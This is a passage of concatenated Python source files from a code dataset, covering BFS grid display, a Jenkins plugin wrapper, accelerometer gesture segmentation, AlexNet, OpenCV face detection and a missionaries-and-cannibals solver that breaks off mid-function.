}\n","sub_path":"deanslist_config.py","file_name":"deanslist_config.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"303938057","text":"# Robot Programming\n# breadth first search\n# by Dr. Qin Chen\n# May, 2016\n\nimport sys\nimport Tkinter as tk\nfrom starter_grid_graph import GridGraph\nfrom starter_bfs import BFS\n\n##############\n# This class supports display of a grid graph. The node location on canvas\n# is included as a data field of the graph, graph.node_display_locations.\n##############\n\nclass GridGraphDisplay(object):\n def __init__(self, frame, graph):\n self.node_dist = 60\n self.node_size = 40\n self.gui_root = frame\n self.canvas = None\n self.graph = graph\n self.nodes_location = graph.node_display_locations\n self.start_node = graph.startNode\n self.goal_node = graph.goalNode\n self.logger_text = None\n\n self.setup_gui()\n return\n\n def setup_gui(self):\n self.gui_root.geometry('400x400')\n self.canvas = tk.Canvas(self.gui_root, width=400, height=400, bg='white')\n self.canvas.pack(expand=1, fill='both')\n return\n\n def set_log_text(self, new_text):\n if self.logger_text:\n self.canvas.itemconfig(self.logger_text, text=new_text)\n\n # draws nodes and edges in a graph\n def display_graph(self):\n self.canvas.delete(\"all\")\n self.logger_text = self.canvas.create_text(380, 20, text='No logging yet...', anchor=tk.NE, justify=tk.RIGHT, state=tk.DISABLED)\n\n for node_name in self.graph.nodes:\n for conn in self.graph.nodes[node_name]:\n self.draw_edge(self.get_node_location(node_name), self.get_node_location(conn), 'black')\n self.draw_node(self.get_node_location(node_name), 'red')\n\n # path is a list of nodes ordered from start to goal node\n def highlight_path(self, path):\n for node_name in path:\n node = self.get_node_location(node_name)\n self.draw_node(node, 'green')\n\n def get_node_location(self, name):\n for node_loc in self.nodes_location:\n if node_loc[0] == name:\n return node_loc[0], node_loc[1] * self.node_dist, node_loc[2] * self.node_dist\n\n return 'None', 0, 0\n\n # draws a node in given color. The node location info is in passed-in node object\n def draw_node(self, node_e, n_color):\n self.canvas.create_oval(node_e[1], node_e[2], node_e[1] + self.node_size, node_e[2] + self.node_size, fill=n_color)\n self.canvas.create_text(node_e[1] + (self.node_size / 2), node_e[2] + (self.node_size / 2), text=node_e[0])\n\n # draws an line segment, between two given nodes, in given color\n def draw_edge(self, node1_e, node2_e, e_color):\n self.canvas.create_line(node1_e[1] + (self.node_size / 2), node1_e[2] + (self.node_size / 2), node2_e[1] + (self.node_size / 2), node2_e[2] + (self.node_size / 2), fill=e_color)\n\ndef main():\n frame = tk.Tk()\n graph = GridGraph()\n\n # grid dimension\n graph.set_grid_rows(4)\n graph.set_grid_cols(3)\n\n # origin of grid is (0, 0) lower left corner\n # graph.obs_list = ([1,1],) # in case of one obs. COMMA\n graph.obs_list = ([3, 0], [2, 2])\n\n graph.set_start('0-0')\n graph.set_goal('2-1')\n\n graph.make_grid()\n graph.connect_nodes()\n graph.compute_node_locations()\n\n bfs = BFS(graph.nodes)\n shortest = bfs.bfs_shortest_path('0-0', '3-2')\n\n print(shortest)\n\n program = GridGraphDisplay(frame, graph)\n program.display_graph()\n\n program.highlight_path(shortest[0])\n\n program.gui_root.mainloop()\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"HamsterLabGrid/starter_grid_graph_display.py","file_name":"starter_grid_graph_display.py","file_ext":"py","file_size_in_byte":3507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"35493233","text":"\"\"\"Primitives for operating on job publishers of type 'Flexible Publisher'\"\"\"\nfrom pyjen.utils.xml_plugin import XMLPlugin\n\n\nclass FlexiblePublisher(XMLPlugin):\n \"\"\"Job plugin enabling conditional execution of post-build steps\n\n https://wiki.jenkins-ci.org/display/JENKINS/Flexible+Publish+Plugin\n \"\"\"\n\n @property\n def actions(self):\n \"\"\"list of publishers associated with this instance\n\n :returns: list of publishers associated with this instance\n :rtype: :class:`list` of :class:`ConditionalPublisher`\n \"\"\"\n nodes = self._root.find(\"publishers\")\n\n retval = []\n for node in nodes:\n plugin = create_xml_plugin(node)\n if plugin is not None:\n retval.append(plugin)\n else:\n self._log.warning(\"Flexible publisher plugin %s not found\",\n get_plugin_name(node))\n\n return retval\n\n @staticmethod\n def get_jenkins_plugin_name():\n \"\"\"Gets the name of the Jenkins plugin associated with this PyJen plugin\n\n This static method is used by the PyJen plugin API to associate this\n class with a specific Jenkins plugin, as it is encoded in the config.xml\n\n :rtype: :class:`str`\n \"\"\"\n return \"flexiblepublish\"\n\n\nclass ConditionalPublisher(XMLPlugin):\n \"\"\"a single 'conditional' publisher contained within the flexible publisher\n \"\"\"\n\n @property\n def publisher(self):\n \"\"\"action to be performed when the conditions of this publisher are met\n\n :returns:\n list of PyJen objects which control each conditional action to be\n performed. Return None if an publisher plugin not currently\n supported by PyJen is being used\n :rtype: :class:`list` of PyJen objects,\n\n \"\"\"\n node = self._root.find(\"publisher\")\n plugin = create_xml_plugin(node)\n\n if plugin is None:\n self._log.warning(\"Publisher plugin %s referenced by Flexible \"\n \"Publisher not found\", get_plugin_name(node))\n\n return plugin\n\n\nPluginClass = FlexiblePublisher\n\n\nif __name__ == \"__main__\": # pragma: no cover\n pass\n","sub_path":"src/pyjen/plugins/flexiblepublish.py","file_name":"flexiblepublish.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"543670833","text":"\"\"\"\nBasic framework to segment and recognize gestures. Intended to work with:\nADXL335GestureRecorder.ino, which can be found here: https://bit.ly/2HUk9oj \n(it's in our CSE599 github in \"Assignments/A3-OfflineGestureRecognizer/GestureRecorder/Arduino/ADXL335GestureRecorder\")\n\n\nBy Jon Froehlich\nhttp://makeabilitylab.io\n\nVisualization code based on:\n- https://electronut.in/plotting-real-time-data-from-arduino-using-python/ by Mahesh Venkitachalam\n- https://www.thepoorengineer.com/en/arduino-python-plot/ \n\n\n\"\"\"\n\nimport sys, serial, argparse\nimport numpy as np\nfrom time import sleep\nfrom collections import deque\nimport itertools\nimport math\nfrom matplotlib.gridspec import GridSpec\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\n# plot class\nclass AccelPlot:\n\n ARDUINO_CSV_INDEX_TIMESTAMP = 0\n ARDUINO_CSV_INDEX_X = 1\n ARDUINO_CSV_INDEX_Y = 2\n ARDUINO_CSV_INDEX_Z = 3\n\n # constr\n def __init__(self, fig, ax, str_port, baud_rate=9600, max_length=100):\n # open serial port\n self.ser = serial.Serial(str_port, 9600)\n\n self.fig = fig\n self.ax = ax\n\n self.data = list()\n num_values_to_plot = 4\n for i in range(0, num_values_to_plot):\n buf = deque()\n self.data.append(buf)\n\n self.x = self.data[0]\n self.y = self.data[1]\n self.z = self.data[2]\n self.mag = self.data[3] \n self.time = deque()\n\n self.max_length = max_length # max length to show\n\n # segmentation stuff\n self.window_length = 30\n self.window_step = 10\n self.window_buffer = deque()\n self.current_event = None #tuple (time list, mag list, x list, y list, z list)\n\n def __add_to_buffer(self, buf, val):\n if len(buf) < self.max_length:\n buf.append(val)\n else:\n buf.popleft()\n buf.append(val)\n\n\n def add_data(self, csv_data):\n self.__add_to_buffer(self.time, csv_data[AccelPlot.ARDUINO_CSV_INDEX_TIMESTAMP])\n self.__add_to_buffer(self.x, csv_data[AccelPlot.ARDUINO_CSV_INDEX_X])\n self.__add_to_buffer(self.y, csv_data[AccelPlot.ARDUINO_CSV_INDEX_Y])\n self.__add_to_buffer(self.z, csv_data[AccelPlot.ARDUINO_CSV_INDEX_Z])\n xval = csv_data[AccelPlot.ARDUINO_CSV_INDEX_X]\n yval = csv_data[AccelPlot.ARDUINO_CSV_INDEX_Y]\n zval = csv_data[AccelPlot.ARDUINO_CSV_INDEX_Z]\n mag = math.sqrt(csv_data[AccelPlot.ARDUINO_CSV_INDEX_X] ** 2 + \n csv_data[AccelPlot.ARDUINO_CSV_INDEX_Y] ** 2 + \n csv_data[AccelPlot.ARDUINO_CSV_INDEX_Z]** 2) \n self.__add_to_buffer(self.mag, mag)\n\n # add mag to window buffer used for segmentation\n self.window_buffer.append(mag)\n\n\n def segment_event(self):\n segment_result = None\n if len(self.window_buffer) >= self.window_length:\n # you may need/want to change these tolerances\n min_max_begin_segment_threshold = 90 \n min_max_continue_segment_threshold = 25 #lower threshold for continuing event\n min_event_length_ms = 600\n\n # analyze the buffer\n s = np.array(self.window_buffer)\n min_max_diff = abs(np.max(s) - np.min(s))\n\n if min_max_diff > min_max_begin_segment_threshold and self.current_event is None:\n print(\"begin segment!\", min_max_diff)\n \n start_idx = len(self.time) - self.window_length\n end_idx = len(self.time)\n \n t = list(itertools.islice(self.time, start_idx, end_idx))\n s = list(itertools.islice(self.mag, start_idx, end_idx))\n x_seg = list(itertools.islice(self.x, start_idx, end_idx))\n y_seg = list(itertools.islice(self.y, start_idx, end_idx))\n z_seg = list(itertools.islice(self.z, start_idx, end_idx))\n\n self.ax.axvline(self.time[-self.window_length], ls='--', color='black', linewidth=1, alpha=0.8)\n self.current_event = (t, s)\n elif self.current_event is not None:\n # we are in the middle or end of a potential event\n if min_max_diff >= min_max_continue_segment_threshold: \n print(\"continue segment\", min_max_diff)\n \n start_idx = len(self.time) - self.window_step\n end_idx = len(self.time)\n \n t = list(itertools.islice(self.time, start_idx, end_idx))\n s = list(itertools.islice(self.mag, start_idx, end_idx))\n x_seg = list(itertools.islice(self.x, start_idx, end_idx))\n y_seg = list(itertools.islice(self.y, start_idx, end_idx))\n z_seg = list(itertools.islice(self.z, start_idx, end_idx))\n\n self.current_event[0].extend(t)\n self.current_event[1].extend(s)\n elif min_max_diff < min_max_continue_segment_threshold:\n print(\"finish segment\", min_max_diff)\n event_time = self.current_event[0]\n event_length_ms = event_time[-1] - event_time[0]\n if event_length_ms > min_event_length_ms:\n self.ax.axvspan(event_time[0], event_time[-1], color='red', alpha=0.4)\n self.ax.axvline(event_time[-1], ls='--', color='black', linewidth=1, alpha=0.8)\n else:\n print(\"discarded event for being too short\")\n\n segment_result = {'time' : self.current_event[0],\n 'signal' : self.current_event[1] }\n \n self.current_event = None # clear events\n\n new_length = self.window_length - self.window_step\n while len(self.window_buffer) > new_length:\n self.window_buffer.popleft()\n\n return segment_result\n\n #def show_subplots(self, segment_result, gestureToCompare, signalsDict):\n\n \n def classify_event(self, segment_result):\n # print(\"classify event\", segment_result)\n t = segment_result['time']\n s = segment_result['signal']\n\n # update plot\n def update(self, frameNum, args, plt_lines):\n try:\n while self.ser.in_waiting:\n line = self.ser.readline()\n line = line.decode('utf-8')\n data = line.split(\",\")\n data = [int(val.strip()) for val in line.split(\",\")]\n #print(data)\n self.add_data(data)\n\n segment_result = self.segment_event()\n if segment_result != None:\n cls_result = self.classify_event(segment_result)\n\n\n # plot the data\n for i in range(0, len(plt_lines)):\n plt_lines[i].set_data(self.time, self.data[i])\n self.ax.set_xlim(self.time[0], self.time[-1])\n\n except KeyboardInterrupt:\n print('exiting')\n\n # except Exception as e:\n # print('Error '+ str(e))\n\n #return a0,\n return plt_lines\n\n # clean up\n def close(self):\n # close serial\n self.ser.flush()\n self.ser.close()\n\n # main() function\n\n\ndef main():\n\t# python serial_plotter.py --port /dev/cu.usbmodem14601\n\t# windows: python lserial_plotter.py --port COM5\t\n # create parser\n\n parser = argparse.ArgumentParser(description=\"Accel Serial Plotter\")\n\n # add expected arguments\n parser.add_argument('--port', dest='port', required=True, help='the serial port for incoming data')\n parser.add_argument('--max_len', dest='max_len', required=False, default=770, type=int, \n help='the number of samples to plot at a time')\n\n # parse args\n args = parser.parse_args()\n\n # strPort = '/dev/tty.usbserial-A7006Yqh'\n str_port = str(args.port)\n\n print('Reading from serial port: {}'.format(str_port))\n\n # plot parameters\n\n fig = plt.figure(figsize=(10, 5), tight_layout=True)\n gs = GridSpec(2, 4, figure=fig)\n ax1 = fig.add_subplot(gs[0, :])\n ax2 = fig.add_subplot(gs[1, 0])\n ax2.set_ylabel(\"x_p\")\n ax2.set_xlabel(\"time\")\n #ax1.setTitle(\"real time gestures\")\n #ax2.setTitle(\"x_p comparison\")\n ax3=fig.add_subplot(gs[1, 1])\n ax3.set_ylabel(\"y_p\")\n ax3.set_xlabel(\"time\")\n ax4=fig.add_subplot(gs[1,2])\n ax4.set_ylabel(\"z_p\")\n ax4.set_xlabel(\"time\")\n ax5= fig.add_subplot(gs[1,3])\n ax5.set_ylabel(\"mag_p\")\n ax5.set_xlabel(\"time\")\n #ax3.setTitle(\"y_p comparison\")\n #ax4.setTitle(\"z_p comparison\")\n #ax5.setTitle(\"mag_p comparison\")\n #ax = plt.axes(xlim=(0, args.max_len), ylim=(0, 1023))\n fig.align_labels()\n ax1.set_ylim((0, 1500))\n ax2.set_ylim((0, 1500))\n ax3.set_ylim((0, 1500))\n ax4.set_ylim((0, 1500))\n ax5.set_ylim((0, 1500))\n #ax = plt.axes(ax1, ylim=(0, 1500))\n #plt.show()\n\n\n accel_plot = AccelPlot(fig, ax1, str_port, max_length=args.max_len)\n\n # set up animation\n \n lines = list()\n num_vals = 4 # x,y,z,mag\n labels = ['x', 'y', 'z', 'mag']\n alphas = [0.8, 0.8, 0.8, 0.9]\n for i in range(0, num_vals):\n line2d, = ax1.plot([1], [1], label=labels[i], alpha=alphas[i])\n lines.append(line2d)\n\n handles, labels = ax1.get_legend_handles_labels()\n ax1.legend(handles, labels)\n\n xpLines = list()\n num_vals_xp = 2\n labels_subplotsx = ['current gesture', 'aggregate gesture']\n labels_subplotsy = ['current gesture', 'aggregate gesture']\n labels_subplotsz = ['current gesture', 'aggregate gesture']\n labels_subplotsmag = ['current gesture', 'aggregate gesture']\n alphassub = [0.8, 0.8]\n ypLines = list()\n zpLines = list()\n magpLines = list()\n for i in range(0, num_vals_xp):\n line2dx = ax2.plot([1], [1], label=labels_subplotsx[i], alpha=alphassub[i])\n xpLines.append(line2dx)\n line2dy = ax3.plot([1], [1], label=labels_subplotsy[i], alpha=alphassub[i])\n ypLines.append(line2dy)\n line2dz = ax4.plot([1], [1], label=labels_subplotsz[i], alpha=alphassub[i])\n zpLines.append(line2dz)\n line2dmag = ax5.plot([1], [1], label=labels_subplotsmag[i], alpha=alphassub[i])\n magpLines.append(line2dmag)\n\n handles1, labels1 = ax3.get_legend_handles_labels()\n ax2.legend(handles1, labels1)\n handles2, labels2 = ax3.get_legend_handles_labels()\n ax3.legend(handles2, labels2)\n handles, labels = ax4.get_legend_handles_labels()\n ax4.legend(handles, labels)\n handles, labels = ax5.get_legend_handles_labels()\n ax5.legend(handles, labels)\n\n # for more on animation function, see https://jakevdp.github.io/blog/2012/08/18/matplotlib-animation-tutorial/\n anim = animation.FuncAnimation(fig, accel_plot.update,\n fargs=(args, lines), # could consider adding blit=True\n interval=50) #interval=50 is 20fps\n # show plot\n plt.show()\n\n # clean up\n accel_plot.close()\n\n print('Exiting...')\n\n\n# call main\nif __name__ == '__main__':\n main()","sub_path":"Our stuff/realtimegesturesegmentation/gesture_rec.py","file_name":"gesture_rec.py","file_ext":"py","file_size_in_byte":11120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"237912431","text":"import csv\n\nindegree = {}\nwith open('heapdump.csv', newline='') as csvfile:\n ptr_reader = csv.reader(csvfile, delimiter=',')\n for row in ptr_reader:\n indegree[row[0]] = 1\n\nwith open('heapdump.csv', newline='') as csvfile:\n ptr_reader = csv.reader(csvfile, delimiter=',')\n for row in ptr_reader:\n for i in range(len(row)):\n col = row[i]\n if i != 1 and i != 0 and col in indegree:\n indegree[col] += 1\n\n# write the pointers that are not linear and their ref_count\nwith open('ref_count.csv','w', newline='') as inp:\n ptr_writer = csv.writer(inp)\n for ptr in indegree:\n if indegree[ptr] > 1:\n ptr_writer.writerow([ptr, indegree[ptr]])\n\n# write blocks that are not linear\nwith open('heapdump.csv', newline='') as inp:\n ptr_reader = csv.reader(inp)\n with open('nonlinear_block.csv', 'w', newline='') as out:\n ptr_writer = csv.writer(out)\n for row in ptr_reader:\n col = row[0]\n if indegree[col] > 1:\n ptr_writer.writerow(row)\n\n# write \nwith open('heapdump.csv', newline='') as inp:\n ptr_reader = csv.reader(inp)\n with open('forward_block.csv', 'w', newline='') as out:\n ptr_writer = csv.writer(out)\n for row in ptr_reader:\n if row[1] == '250' or row[1] == '252':\n ptr_writer.writerow(row)\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"151697627","text":"\n\nimport numpy as np\n\nimport pandas as pd\n\nimport seaborn as sns\n\nimport math\n\nimport matplotlib\n\nimport matplotlib.pyplot as plt\n\nimport random\n\nimport statistics as st\n\nimport AntSimulation as ans\n\n#Parameter order \n#grid_size, num_cols, max_oc, ants_per_colony, alpha, beta, w, evap, pher_trail\n\n#parameter sweep result variables\n\nalpha = 1\nbeta = 1\ngrid_size = 20\nnum_colonies = 3\nmax_occ = 20\nants_per_col = 50\nw=.5\nevap = .9\npher_trail = 2\n\n\nparamlst = [ 20, 30, 40, 50 ] \nparamlstt = [ 2, 3, 4, 5, 6 ]\n\n\nresultslst = []\n\nfor m in paramlst:\n resultslstt = []\n for k in paramlstt:\n \n vals = []\n \n for pe in range(10):\n ModelObj = ans.init_model(m, k, max_occ, ants_per_col, alpha, beta, w, evap, pher_trail)\n delivery_total = 0\n for ex in range(50):\n delivery_total += ans.update_model(ModelObj)\n \n vals.append(delivery_total)\n\n \n score = sum(vals)/len(vals)\n resultslstt.append(score)\n\n resultslst.append(resultslstt)\n\n\nprint(resultslst)\n\nresarr = pd.DataFrame( resultslst)\n\nprint(resarr)\n\n\np1 = sns.heatmap(resarr, cmap=\"YlGnBu\", yticklabels=paramlst, xticklabels=paramlstt, annot=True, fmt=\".1f\")\np1.invert_yaxis()\nplt.xlabel('Number of colonies')\nplt.ylabel('Grid size')\nplt.title('Total deliveries heatmap by Grid size and number of colonies')\nplt.show()\n\n\n\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"398376954","text":"from pathlib import Path\nimport pandas as pd\nfrom warnings import warn\n\nroot_path = Path(\"/Volumes/lhab_public/03_Data/04_data_questionnaires/00_rawdata_tp6/04_complete\")\nout_path = Path(\"/Volumes/lhab_public/03_Data/04_data_questionnaires/00_rawdata_tp6/aggregated_data\")\nout_path.mkdir(exist_ok=True)\n\nfiles = sorted(root_path.glob(\"*quest*.xlsx\"))\ndf_out = pd.DataFrame()\n\n\ndef excel_letter_to_num(l):\n from string import ascii_lowercase\n letter_lut = {letter: index for index, letter in enumerate(ascii_lowercase, start=0)}\n return letter_lut[l.lower()]\n\n\ndef extract_data_via_mapping(file, lut, sheet=\"01_Veränderungsfragebogen\", row_offset=-2):\n df_out = pd.DataFrame()\n lut = lut.dropna(axis=\"index\", how=\"all\")\n\n df_in = pd.read_excel(file, sheet_name=sheet)\n for _, row in lut.iterrows():\n name, col_idx, row_idx = row[\"variable_short_engl\"], excel_letter_to_num(row[\"value_col\"]), \\\n int(row[\"value_row\"]) + row_offset\n df_out = df_out.append(pd.DataFrame({\"variable\": name, \"value\": df_in.iloc[row_idx, col_idx]}, index=[0]))\n df_out = df_out.set_index(\"variable\").T\n\n return df_out\n\n\nsheets = [\"02_Gesundheitszustand\", \"10_Soziale_Unterstützung\", \"12_Pittsburgh_Sleep_Inventory\"]\n\nfor sheet in sheets:\n print(sheet)\n lut_file = Path(f\"/Volumes/lhab_public/03_Data/04_data_questionnaires/00_rawdata_tp6/mapping/mapping_{sheet}.xlsx\")\n lut = pd.read_excel(lut_file)\n\n dfs = []\n for f in files:\n print(f)\n id = pd.read_excel(f, sheet_name=\"ID\", usecols=\"A:B\", names=[\"variable\", \"value\"], header=None)\n id.dropna(axis=\"index\", how=\"all\", inplace=True)\n id = id.set_index(\"variable\").T\n id[\"file\"] = f\n\n df1 = extract_data_via_mapping(f, lut, sheet=sheet)\n df = pd.concat((id, df1), axis=1)\n dfs.append(df)\n\n df_out = pd.concat(dfs, axis=0, sort=False)\n df_out.to_excel(out_path / f\"00_aggregated_{sheet}.xlsx\", index=False)\n","sub_path":"scripts/aggregate_tp6/aggregate_quest_health_social_psqi_tp6.py","file_name":"aggregate_quest_health_social_psqi_tp6.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"232111159","text":"import cv2\r\n\r\n#Creating a cascading classifier object\r\nface_cascade = cv2.CascadeClassifier(\"C:\\\\Users\\\\subha\\\\docs\\\\Desktop\\\\Coursera\\\\Python\\\\work_place\\\\haarcascade_frontalface_alt.xml\")\r\neye_cascade = cv2.CascadeClassifier(\"C:\\\\Users\\\\subha\\\\docs\\\\Desktop\\\\Coursera\\\\Python\\\\work_place\\\\haarcascade_eye.xml\")\r\n\r\n#Reading an image as it is\r\nimg = cv2.imread(\"C:\\\\Users\\\\subha\\\\Pictures\\\\basant\\\\face_detect.jpg\")\r\n\r\n#Converting it to gray scale image\r\ngray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n#Finding coordinates of faces in image\r\nfaces = face_cascade.detectMultiScale(gray_img, scaleFactor=1.05, minNeighbors=5)\r\n\r\nprint(type(faces))\r\nprint(faces)\r\n\r\nfor x, y, w, h in faces:\r\n img = cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 3)\r\n\r\nresized = cv2.resize(img, (800,800))\r\ncv2.imshow(\"Gray\",resized)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"facedetection.py","file_name":"facedetection.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"118116021","text":"# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.core import urlresolvers\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef get_edit_admin_page(profile_id):\n url_to_admin_edit_page = urlresolvers.reverse('admin:main_profile_change', args=(profile_id,))\n return url_to_admin_edit_page\n","sub_path":"main/templatetags/main_tags.py","file_name":"main_tags.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"116503477","text":"import torch.nn as nn\nimport torch\n\n\nclass AlexNet(nn.Module):\n def __init__(self, num_classes=1000, init_weights=False):\n super(AlexNet, self).__init__()\n # 卷积层的定义,具体的输入输出特征尺寸计算公式可以自行学习其他资料,利用好网络这把双刃剑\n '''\n nn.Conv2d(padding=2)其中的padding接收的参数可以是整型也可以是元组\n 如果是整形,那么相当于再图片的四周补上padding行0\n 如果是元组(a,b):\n 在图片的上下填充a行0\n 在图片的左右填充b列0\n '''\n self.features = nn.Sequential(\n nn.Conv2d(3, 96, kernel_size=11, stride=4, padding=2), # input[3, 224, 224] output[96, 55, 55]\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2), # output[96, 27, 27]\n nn.Conv2d(96, 256, kernel_size=5, stride=1,padding=2), # output[256, 27, 27]\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2), # output[256, 13, 13]\n nn.Conv2d(256, 384, kernel_size=3,stride=1, padding=1), # output[384, 13, 13]\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 384, kernel_size=3,stride=1,padding=1), # output[384, 13, 13]\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3,stride=1, padding=1), # output[256, 13, 13]\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2), # output[256, 6, 6]\n )\n # 全连接层的定义\n self.classifier = nn.Sequential(\n # p=0.5代表神经元随机丢弃(失活)的比例\n nn.Dropout(p=0.5),\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(p=0.5),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n nn.Linear(4096, num_classes),\n )\n # 是否初始化权重\n if init_weights:\n # 调用初始化权重函数\n self._initialize_weights()\n # Alexnet网络的前向传播过程\n def forward(self, x):\n # 卷积层\n x = self.features(x)\n # 特征拉直,然后输入全连接层\n '''\n 假设类型为 torch.tensor 的张量 t 的形状如下所示:(2,4,3,5,6),则 orch.flatten(t, 1, 3).shape 的结果为\n (2, 60, 6)。将索引为 start_dim 和 end_dim 之间(包括该位置)的数量相乘,其余位置不变。\n 因为默认 start_dim=0,end_dim=-1,所以 torch.flatten(t) 返回只有一维的数据。\n '''\n x = torch.flatten(x, start_dim=1)\n # 将拉直的特征输入全连接层\n x = self.classifier(x)\n return x\n # 初始化权重函数\n def _initialize_weights(self):\n # self.modules()是一个迭代器\n # 这里for循环是迭代模型中的对象\n for m in self.modules():\n # 判断对象是否是卷积层\n if isinstance(m , nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n # 如果偏置项不为空,那么则\n if m.bias is not None:\n # m.bias初始化为0\n nn.init.constant_(m.bias, 0)\n # 判断对象是否是全连接层\n elif isinstance(m, nn.Linear):\n # 按照正态分布给权重初始化\n nn.init.normal_(m.weight, 0, 0.01)\n # m.bias初始化为0\n nn.init.constant_(m.bias, 0)\n","sub_path":"alexnet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"498003404","text":"''' I had played a simulation on http://www.plastelina.net/ to try to figure out the\nmissonary cannibal solution. I got to this solution when playing\n\n1.One cannibal and one monk rowed across the river, one canibal stayed and one monk rowed back \n2.Took the monk out, took two cannibals across, dropped the cannibal off, canibal rowed back. \n3.Took the cannibal out, two monks got in, dropped off one monk, and cannibal and monk rowed back. \n4.Cannibal gets out, two monks get in, two monks get out, canibal gets in. \n5.Cannibal gets one cannibal, drops of one cannibal \n6.Cannibal goes get another cannibal, drops off two cannibals'''\n\n\nimport math\n\n\nclass State():\n\tdef __init__(self, cannibalLeft, missionaryLeft, boat, cannibalRight, missionaryRight):\n\t\tself.cannibalLeft = cannibalLeft\n\t\tself.missionaryLeft = missionaryLeft\n\t\tself.boat = boat\n\t\tself.cannibalRight = cannibalRight\n\t\tself.missionaryRight = missionaryRight\n\t\tself.parent = None\n\n\tdef isGoal(self):\n\t\tif self.cannibalLeft == 0 and self.missionaryLeft == 0:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef isValid(self):\n\t\tif self.missionaryLeft >= 0 and self.missionaryRight >= 0 \\\n and self.cannibalLeft >= 0 and self.cannibalRight >= 0 \\\n and (self.missionaryLeft == 0 or self.missionaryLeft >= self.cannibalLeft) \\\n and (self.missionaryRight == 0 or self.missionaryRight >= self.cannibalRight):\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef __eq__(self, other):\n\t\treturn self.cannibalLeft == other.cannibalLeft and self.missionaryLeft == other.missionaryLeft \\\n and self.boat == other.boat and self.cannibalRight == other.cannibalRight \\\n and self.missionaryRight == other.missionaryRight\n\n\tdef __hash__(self):\n\t\treturn hash((self.cannibalLeft, self.missionaryLeft, self.boat, self.cannibalRight, self.missionaryRight))\n\ndef successors(cur_state):\n\tchildren = [];\n\tif cur_state.boat == 'left':\n\t\tnewState = State(cur_state.cannibalLeft, cur_state.missionaryLeft - 2, 'right',\n cur_state.cannibalRight, cur_state.missionaryRight + 2)\n\t\t## One missionary and one cannibal cross left to right.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft, cur_state.missionaryLeft - 1, 'right',\n cur_state.cannibalRight, cur_state.missionaryRight + 1)\n\t\t\n\t\t\t\t## Two missionaries cross left to right.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft - 2, cur_state.missionaryLeft, 'right',\n cur_state.cannibalRight + 2, cur_state.missionaryRight)\n\t\t\n\t\t## Two cannibals cross left to right.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft - 1, cur_state.missionaryLeft - 1, 'right',\n cur_state.cannibalRight + 1, cur_state.missionaryRight + 1)\n\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft - 1, cur_state.missionaryLeft, 'right',\n cur_state.cannibalRight + 1, cur_state.missionaryRight)\n\t\t## One cannibal crosses left to right.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\telse:\n\t\tnewState = State(cur_state.cannibalLeft, cur_state.missionaryLeft + 2, 'left',\n cur_state.cannibalRight, cur_state.missionaryRight - 2)\n\t\t\n\t\t\n\t \t\t\n\t\t## Two missionaries cross right to left.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft + 2, cur_state.missionaryLeft, 'left',\n cur_state.cannibalRight - 2, cur_state.missionaryRight)\n\t\t## Two cannibals cross right to left.\n\t\tif newState.isValid():\n\t\t\tnewState.parent = cur_state\n\t\t\tchildren.append(newState)\n\t\tnewState = State(cur_state.cannibalLeft + 1, cur_state.missionaryLeft + 1, 'left',\n cur_state.cannibalRight - 1, cur_state.missionaryRight - 1)\n\t\t## One missionary and one cannibal cross right to left.\n\t\tif 